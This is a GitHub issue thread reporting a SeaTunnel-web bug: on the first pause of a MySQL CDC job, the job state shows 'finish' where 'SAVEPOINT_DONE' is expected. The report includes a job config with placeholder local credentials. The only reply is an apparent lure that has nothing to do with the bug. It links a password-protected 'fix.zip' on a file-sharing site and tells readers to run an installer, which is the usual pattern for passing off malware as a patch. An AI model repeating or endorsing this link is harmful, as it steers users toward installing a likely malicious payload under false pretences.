### ISSUE TITLE
[Bug] [Seatunnel-web] When job execution mysql cdc initialization The first time you hit pause it shouldn't be finish  should be SAVEPOINT_DONE

### ISSUE THREAD

**Issue by fanxishu** [apache/seatunnel#7495]
### Search before asking

- [X] I had searched in the [issues](https://github.com/apache/seatunnel/issues?q=is%3Aissue+label%3A%22bug%22) and found no similar issues.

### What happened

The first click on the pause state should not be finish it should be SAVEPOINT_DONE and then click on the resume state the second click on the pause state is normal, the first click on the problem web page state
![21a23c7e07f0e7eae416dc75d9802cbc](https://github.com/user-attachments/assets/1bec1ffd-d302-4599-8933-6de19594d49d)
![77492f2d79e55bd17963d4f36e6b0207](https://github.com/user-attachments/assets/54662ec8-9a52-4a9d-8271-9b45dff3cae7)
![00503683c6cf24ebf6622265f6bf36fd](https://github.com/user-attachments/assets/ab6452ab-d74c-425f-9179-4e71d4f462ce)
![897c449dbb8932a1af2ae17d849f0b6a](https://github.com/user-attachments/assets/e81c4b82-603a-470e-a478-440e7f2f9815)
![image](https://github.com/user-attachments/assets/51146369-1fec-44dd-8f64-c76cbe0af8b0)
![image](https://github.com/user-attachments/assets/fc409026-380b-4871-9c2e-9c635fbca6ef)
![image](https://github.com/user-attachments/assets/6a9cc4ff-b199-4037-8bab-f93939d4fc80)

### SeaTunnel Version

2.3.7 

### SeaTunnel Config

```conf
env {
"job.mode"=STREAMING
"job.name"="SeaTunnel_Job"
"checkpoint.interval"="3000"
"checkpoint.timeout"="3000"
"savemode.execute.location"=CLUSTER
}
source {
MySQL-CDC {
    "snapshot.split.size"=8096
    "snapshot.fetch.size"=1024
    "incremental.parallelism"=1
    "connect.timeout.ms"=30000
    "connect.max-retries"=3
    "connection.pool.size"=20
    "chunk-key.even-distribution.factor.lower-bound"=0.05
    "chunk-key.even-distribution.factor.upper-bound"=100
    "sample-sharding.threshold"=1000
    "inverse-sampling.rate"=1000
    "startup.mode"=INITIAL
    "exactly_once"="false"
    "stop.mode"=NEVER
    parallelism=1
    "result_table_name"=Table14609115813120
    catalog {
        factory=Mysql
    }
    database-names=[
        seatunnel
    ]
    table-names=[
        "seatunnel.user"
    ]
    format=DEFAULT
    password="123456"
    username=root
    base-url="jdbc:mysql://127.0.0.1:3380/test?useUnicode=true&characterEncoding=UTF-8&rewriteBatchedStatements=true"
    server-time-zone=UTC
}
}
transform {
}
sink {
Jdbc {
    "schema_save_mode"="CREATE_SCHEMA_WHEN_NOT_EXIST"
    "data_save_mode"="APPEND_DATA"
    "connection_check_timeout_sec"=30
    "batch_size"=1000
    "is_exactly_once"="false"
    "max_commit_attempts"=3
    "transaction_timeout_sec"=-1
    "max_retries"="3"
    "auto_commit"="true"
    "support_upsert_by_query_primary_key_exist"="false"
    "multi_table_sink_replica"=1
    "source_table_name"=Table14609115813120
    "generate_sink_sql"=true
    database=test2
    table=user
    password="123456"
    url="jdbc:mysql://127.0.0.1:3380/test1?useUnicode=true&characterEncoding=UTF-8&rewriteBatchedStatements=true"
    driver="com.mysql.cj.jdbc.Driver"
    user=root
}
}
```

### Running Command

```shell
The first click on the pause state should not be finish it should be SAVEPOINT_DONE and then click on the resume state the second click on the pause state is normal, the first click on the problem web page state
```

### Error Exception

```log
The first click on the pause state should not be finish it should be SAVEPOINT_DONE and then click on the resume state the second click on the pause state is normal, the first click on the problem web page state
```

### Are you willing to submit PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
